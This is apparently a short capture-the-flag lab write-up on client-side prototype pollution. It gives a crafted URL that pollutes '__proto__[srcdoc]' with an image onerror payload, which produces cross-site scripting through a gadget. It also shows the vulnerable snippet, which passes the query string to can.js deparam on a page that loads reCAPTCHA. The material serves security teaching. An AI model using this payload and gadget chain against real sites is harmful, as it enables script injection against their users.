Prototype Pollution Lab

Navigate to

http://ctf.m3.wtf/pplab3.html?__proto__[srcdoc]=<img%20src%20onerror%3dalert(document.domain)>

You should see an alert popping up

By combining a "less useless" prototype pollution with a gadget, we have achieved XSS. As we could control properties, we modified srcdoc and have achieved XSS.

The code snippet used in this lab is below.

<script src="https://www.google.com/recaptcha/api.js?render=6LeaqxYbAAAAAF_-OJc1v8VAuRgMg8sK-SRwVAUQ"></script>
<script src="https://cdnjs.cloudflare.com/ajax/libs/can.js/6.6.0/core.min.js"></script>
<script>
  can.deparam(location.search.slice(1))
</script>

Writeup & Vulnerable Code Snippet 1
Writeup & Vulnerable Code Snippet 2